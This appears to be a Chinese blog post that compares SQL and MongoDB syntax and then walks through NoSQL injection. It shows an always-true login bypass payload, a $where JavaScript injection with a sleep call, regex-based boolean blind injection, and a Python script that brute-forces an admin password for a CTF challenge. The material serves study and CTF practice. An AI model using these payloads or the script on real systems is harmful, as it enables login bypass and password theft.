CHHHCHHOH 's BLOG

nosql

参考博客

MongoDB基础

SQL 概念MongoDB 概念说明
databasedatabase数据库
tablecollection数据库表/集合
rowdocument数据记录行/文档
columnfield数据字段/域
indexindex索引
primary keyprimary key主键,MongoDB 自动将 _id 字段设置为主键
mysqlMongoDB说明
create DATABASE_NAMEuse DATABASE_NAME数据库不存在,则自动创建数据库
use DATABASE_NAMEuse DATABASE_NAME
database()db
show databasesshow dbs没有数据的数据库无法显示出来
drop database DATABASE_NAMEdb.dropDatabase()
create table testdb.createCollection("myNewCollection")
show tablesshow collections/show tables
insert into table_name values('','')db.mycol2.insert({"name" : "菜鸟教程"})没有这个集合会自动创建
drop table table_namedb.mycol2.drop()
select * from table_namedb.users.find()
select * from table_name where age>5db.myCollection.find({ age: { $gt: 25 } })$gt(>)、$lt(<)、$gte(>=)、$lte(<=)、$eq(=)、$ne(!=)
select * from table_name where a>1 and b <1db.myCollection.find({$and: [{ age: { $gt: 25 } },{ city: "New York" }]});$and、$or、$not、$nor
where likes>50 AND (by = '菜鸟教程' OR title = 'MongoDB 教程')db.col.find({"likes": {$gt:50}, $or: [{"by": "菜鸟教程"},{"title": "MongoDB 教程"}]})

联合注入

例:String stringQuery = "{ 'username' : '" + name + "', 'password' : '" + password + "'}";
name=1&password=1 ==> {'username':'1':'password':'1'}
username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456 ==> { 'username': 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: '123456'} 为永真

JavaScript 注入

$where可以执行js代码如查找username等于whoami的数据 db.users.find({ $where: "function(){return(this.username == 'whoami')}" })
让服务器sleep
db.users.find({ $where: "function(){sleep(5000);return(this.username == 'a')}" })

布尔盲注

db.users.find({'username':'admin', 'password':{$regex:'.{32}'}}),password匹配32个除\n任意字符,有回显,匹配31个也有回显
db.users.find({'username':'admin', 'password':{$regex:'.{33}'}}),password匹配33个,不回显
所以password长度为32,


CISCN 2024华中赛区ezjava

import requests

url = "http://127.0.0.1:9999/login"
mylist = "abcdefghijklmnopqrstuvwxyz0123456789"
password = ""
proxies = {}
for i in range(32):
    for j in mylist:
        data = {
            "username":"admin","password":"','password':{'$regex':'^"+password+j+".*'},'username':'admin"
        }
        #','password':{'$regex':'^x.*'},'username':'admin
        r = requests.post(url,data=data,proxies=proxies)
        if r.text.find("username or password incorrect")==-1:
            password+=j
            print(password)

添加新评论